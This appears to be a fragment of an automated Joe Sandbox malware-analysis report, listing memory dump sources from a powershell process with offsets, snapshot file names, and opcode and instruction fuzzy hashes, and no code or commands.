                                                                                                                                                            • Source File: 00000022.00000002.2258134330.0000000005270000.00000040.00000800.00020000.00000000.sdmp, Offset: 05270000, based on PE: false
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_34_2_5270000_powershell.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID:
                                                                                                                                                            • Opcode ID: 1263764d75c3c97df387cee35816a559df3254e2ded4de1c5af570576764c97a
                                                                                                                                                            • Instruction ID: e5eccc9ee48229f6ef3b759672d13ac6540bbcd61c9c82d39d409df2b290634f
                                                                                                                                                            • Opcode Fuzzy Hash: 1263764d75c3c97df387cee35816a559df3254e2ded4de1c5af570576764c97a
                                                                                                                                                            • Instruction Fuzzy Hash: A1110424D093C98FCB16EBB899248AC7FB6BF8230071884EEC145CF2A3DE758905E751
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000022.00000002.2258134330.0000000005270000.00000040.00000800.00020000.00000000.sdmp, Offset: 05270000, based on PE: false
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_34_2_5270000_powershell.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID:
                                                                                                                                                            • Opcode ID: 93a105d0dcd9282d102c39e27646fc9273b0bcbe7ff8b063c11217fccf8d0c12
                                                                                                                                                            • Instruction ID: 36a14b397a444eecbfad7e8425a44757f9718961e77876ee0adcadaea158d6a9
                                                                                                                                                            • Opcode Fuzzy Hash: 93a105d0dcd9282d102c39e27646fc9273b0bcbe7ff8b063c11217fccf8d0c12
                                                                                                                                                            • Instruction Fuzzy Hash: 6F01F1756003A04FC721EB7CE80095EBFF2EFC5251704896EE559CF222E7749909CBA0
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000022.00000002.2257160176.00000000035FD000.00000040.00000800.00020000.00000000.sdmp, Offset: 035FD000, based on PE: false
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_34_2_35fd000_powershell.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID:
                                                                                                                                                            • Opcode ID: 063219b8a5922e0d7d3d5474c463a8c4aae360356399bf8446c3ba9f5366bba9
                                                                                                                                                            • Instruction ID: 214120b8c33b27b09cb0de30c269f366fca68139c52a234ee93b88b0e3991ed3
                                                                                                                                                            • Opcode Fuzzy Hash: 063219b8a5922e0d7d3d5474c463a8c4aae360356399bf8446c3ba9f5366bba9
                                                                                                                                                            • Instruction Fuzzy Hash: 4E01D4710053409FE710CA16EC84B67BFECEB51325F0CC86AEE480B25AD6799841C6B1
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000022.00000002.2257160176.00000000035FD000.00000040.00000800.00020000.00000000.sdmp, Offset: 035FD000, based on PE: false
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_34_2_35fd000_powershell.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID:
                                                                                                                                                            • Opcode ID: 0b8f101640877259097b26450229193e8df181a01cb3e805d7833b5f92c44b6d
                                                                                                                                                            • Instruction ID: 9d6b99f508e700da0bf01f46355d7291f5416f7808e68995f02007df2cc301aa
                                                                                                                                                            • Opcode Fuzzy Hash: 0b8f101640877259097b26450229193e8df181a01cb3e805d7833b5f92c44b6d
                                                                                                                                                            • Instruction Fuzzy Hash: BF012D7200E3C09FD7128B25D894B56BFB8EF53224F1D80DBD9888F1A7C2695849C772
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000022.00000002.2258134330.0000000005270000.00000040.00000800.00020000.00000000.sdmp, Offset: 05270000, based on PE: false
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_34_2_5270000_powershell.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID:
                                                                                                                                                            • Opcode ID: 3315af2f458e575c3e86ffe9f948642c701d8066777b8b879b6b7eb106bf1caf
                                                                                                                                                            • Instruction ID: c0d4df0bb2ac7257f60079c5a0f987331742197a2cf7ba2ca77fb6fdfd89ee30
                                                                                                                                                            • Opcode Fuzzy Hash: 3315af2f458e575c3e86ffe9f948642c701d8066777b8b879b6b7eb106bf1caf
                                                                                                                                                            • Instruction Fuzzy Hash: FEF0C235604259AFCB10DB6CC8849CABFBAFF89210F14C1A6E448CB251D3309948C7D0
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000022.00000002.2258134330.0000000005270000.00000040.00000800.00020000.00000000.sdmp, Offset: 05270000, based on PE: false
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_34_2_5270000_powershell.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID:
                                                                                                                                                            • Opcode ID: 042e0cd7a49291093a54fdd8743980ada9a6bd76672b5cd3c4a5a717d858c144
                                                                                                                                                            • Instruction ID: 20d182b2948cb8996f156575886d0905e3045f61d5eca5b33edd8059ec0bec0c
                                                                                                                                                            • Opcode Fuzzy Hash: 042e0cd7a49291093a54fdd8743980ada9a6bd76672b5cd3c4a5a717d858c144
                                                                                                                                                            • Instruction Fuzzy Hash: 46F0B431E142959FCB11DFB998445DABBF1FF8921170085BAD0AAC6500E3359949DF90
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000022.00000002.2258134330.0000000005270000.00000040.00000800.00020000.00000000.sdmp, Offset: 05270000, based on PE: false
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_34_2_5270000_powershell.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID:
                                                                                                                                                            • Opcode ID: ad37e75aff877d8012a18dac7b25a725c4f2c4efd4b7e4aecd219c2d0b556e9c
                                                                                                                                                            • Instruction ID: 7f4294dbbee3edcf3167efb7bbd4be08749ce200e2b92d9a0a77a482689ff397
                                                                                                                                                            • Opcode Fuzzy Hash: ad37e75aff877d8012a18dac7b25a725c4f2c4efd4b7e4aecd219c2d0b556e9c
                                                                                                                                                            • Instruction Fuzzy Hash: A5D017396506149FD341ABA8E41C99637BAFB89720B0141A6EA09CB322DA659C008BD1